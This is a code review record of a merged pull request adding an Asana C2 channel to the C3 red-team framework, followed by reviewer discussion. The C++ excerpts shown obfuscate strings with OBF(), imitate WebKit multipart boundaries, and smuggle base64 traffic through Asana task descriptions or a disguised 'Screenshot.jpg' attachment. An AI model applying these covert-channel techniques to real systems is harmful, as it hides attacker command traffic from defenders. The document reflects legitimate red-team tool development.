### PR TITLE
Add Asana C2 channel

### PR DESCRIPTION
**Pull request by tvgdb**
Howdy,

This pull request adds another channel to C3 by using the Asana application (asana.com). Asana is a popular project management & task tracking tool, with a straightforward REST API. 

The inner workings are (briefly) explained in `Res/AsanaChannel.md`, as well as a small intro on how to set up your Asana account for use with this channel. 

I'm definitely no C++ guru so I appreciate any comments/remarks/criticism on my code! 

PS. In the first commit I had to remove an import from `ProxyHelpers.h` to fix a linking error. Thanks to @nurfed1 for helping me figure this out.

### CODE REVIEW

File: Src/Common/FSecure/AsanaApi/AsanaApi.cpp [hunk 1]
```diff
@@ -0,0 +1,196 @@
...
+
+std::string FSecure::AsanaApi::AddAttachmentToTask(std::string const& taskId, std::vector<uint8_t> const& attachmentBody, std::string const& attachmentFileName, std::string const& attachmentMimeType) {
+	std::string url = OBF("https://app.asana.com/api/1.0/tasks/") + taskId + OBF("/attachments");
+	// Generating body
+	const std::string boundary_prefix(OBF("------WebKitFormBoundary")); // Mimicking WebKit
+	const std::string alphabet(OBF("0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"));
+	std::string boundary = boundary_prefix;
+	for (int i = 0; i < 16; i++) { // Generate random boundary string
+		boundary.push_back(alphabet[rand() % alphabet.size()]);
+	}
```
Comment (grzryc) [inline Src/Common/FSecure/AsanaApi/AsanaApi.cpp:121]: Please use `boundary += Utils::GenerateRandomString(16)`

File: Src/Common/FSecure/AsanaApi/AsanaApi.cpp [hunk 2]
```diff
@@ -0,0 +1,196 @@
...
+
+FSecure::ByteVector FSecure::AsanaApi::SendHttpRequest(std::string const& host, std::wstring contentType, std::vector<uint8_t> const& data, FSecure::WinHttp::Method method, bool setAuthorizationHeader) {
+	while (true) {
+		HttpClient webClient(ToWideString(host), m_ProxyConfig);
+		HttpRequest request;
+		request.m_Method = method;
+
+		if (!data.empty()) {
+			request.SetData(contentType, data);
+		}
```
Comment (grzryc) [inline Src/Common/FSecure/AsanaApi/AsanaApi.cpp:171]: [Style] brackets - This `if` has brackets, the next one doesn't, and the last `if - else` uses both. Use one style for single line statements.

File: Src/Common/FSecure/C3/Interfaces/Channels/Asana.cpp [hunk 3]
```diff
@@ -0,0 +1,112 @@
...
+	// Asana's task descriptions can't exceed 65 535 characters. If the packet is bigger than this treshold, we upload an attachment instead.
+	if (data.size() < cppcodec::base64_rfc4648::decoded_max_size(65'535)) {
+		// Data size is smaller than treshold, proceeding by adding data to the Description field of the task.
+		m_asanaObj.CreateTask(taskName, cppcodec::base64_rfc4648::encode(data.data(), data.size()));
+		return data.size();
+	} else {
+		// Data size is larger than treshold, proceeding by putting data in the task's attachment
+		std::string attachmentName = OBF("Screenshot.jpg"); // inconspicuous attachment name
+		// Make sure we're not sending more than 100MB in attachment (this check is probably overly cautious)
+		constexpr auto maxPacketSize = cppcodec::base64_rfc4648::decoded_max_size(104'857'600);
```
[the remark this answers is not in the document]
Comment (tvgdb) [reply Src/Common/FSecure/C3/Interfaces/Channels/Asana.cpp]: Good catch! This is a leftover from when the implementation used base64 encoded `txt` files as attachments. Fixed in commit e1141a370b8ded5e8ae534f94ba5e9ff0c2acc4f.

File: Src/Common/FSecure/C3/Interfaces/Channels/Asana.cpp [hunk 4]
```diff
@@ -0,0 +1,112 @@
...
+	m_attachmentPrefix = cppcodec::base64_rfc4648::decode(attachmentPrefixBase64);
```
[the remark this answers is not in the document]
Comment (tvgdb) [reply Src/Common/FSecure/C3/Interfaces/Channels/Asana.cpp:13]: I'm having some trouble getting this to work; when using the `binary` parameter, I'm seeing two issues:

1. The 'file upload' feature of the frontend includes a `data:image/jpeg;base64,` prefix to the base64 of the image file. This prefix causes the gateway to fail decoding the base64.
2. When manually removing the `data:image/jpeg;base64,` prefix, the gateway properly decodes the base64 string; however, when creating a Relay, the frontend doesn't auto-fill the parameter, requiring the operator to manually select the same file again (and removing the prefix again).

Any suggestions?

File: Src/Common/FSecure/AsanaApi/AsanaApi.h [hunk 5]
```diff
@@ -0,0 +1,102 @@
...
+		/// Create a section
+		/// @param sectionName - the name of the section to retrieve
+		/// @return - the id of the section
+		std::string CreateSectionIdByName(std::string const& sectionName);
+
+		/// Send http request, uses preset token for authentication (wrapper to easily set content type)
+		FSecure::ByteVector FSecure::AsanaApi::SendHttpRequest(std::string const& host, WinHttp::ContentType contentType, std::vector<uint8_t> const& data, WinHttp::Method method, bool setAuthorizationHeader = true);
+
+		/// Send http request, uses preset token for authentication
+		FSecure::ByteVector FSecure::AsanaApi::SendHttpRequest(std::string const& host, std::wstring contentType, std::vector<uint8_t> const& data, WinHttp::Method method, bool setAuthorizationHeader = true);
```
[the remark this answers is not in the document]
Comment (tvgdb) [reply Src/Common/FSecure/AsanaApi/AsanaApi.h]: Changing the type to `std::string` seems unnessecary, as `HttpRequest::SetData` takes a `std::wstring`. I've added the `const&` in 591bc5a1f74421766f8a796c7409e45c87d11ad1 though.

File: Src/Common/FSecure/AsanaApi/AsanaApi.cpp (hunk 1 above)
Comment (tvgdb) [reply Src/Common/FSecure/AsanaApi/AsanaApi.cpp]: Resolved in e8c2dca8466d567b598e828144e1e8f6f5e23bfd.

File: Src/Common/FSecure/AsanaApi/AsanaApi.cpp (hunk 2 above)
Comment (tvgdb) [reply Src/Common/FSecure/AsanaApi/AsanaApi.cpp:167]: Resolved in 59b55f11f75d62233d1781cc5e2a28dbe0cc7967.

File: Src/Common/FSecure/AsanaApi/AsanaApi.h (hunk 5 above)
[the remark this answers is not in the document]
Comment (grzryc) [reply Src/Common/FSecure/AsanaApi/AsanaApi.h]: 👍 That's what I wanted to say

File: Src/Common/FSecure/C3/Interfaces/Channels/Asana.cpp (hunk 4 above)
[the remark this answers is not in the document]
Comment (grzryc) [reply Src/Common/FSecure/C3/Interfaces/Channels/Asana.cpp:13]: Oops, sorry for that. Right now let's leave the hardcoded image, I'll update it once, we fix the frontend bugs.

[the remark this answers is not in the document]
Comment (tvgdb) [reply Src/Common/FSecure/C3/Interfaces/Channels/Asana.cpp:13]: Sounds good! I'd be happy to submit a new pull request when the frontend stuff is fixed :-)

**Comment by grzryc** [comment]
Thanks a lot. Merged to master with the rest of new channels :)

Follow up to the image prefix: those bugs should be fixed now, I even tested passing the image as a `binary` argument, but I forgot that we only reserve 4kB for initial channel arguments, so that pretty much every .jpeg exceeds that, and it fails to create a Relay.
So lets keep the hardcoded image for the moment.

**Pull request merged**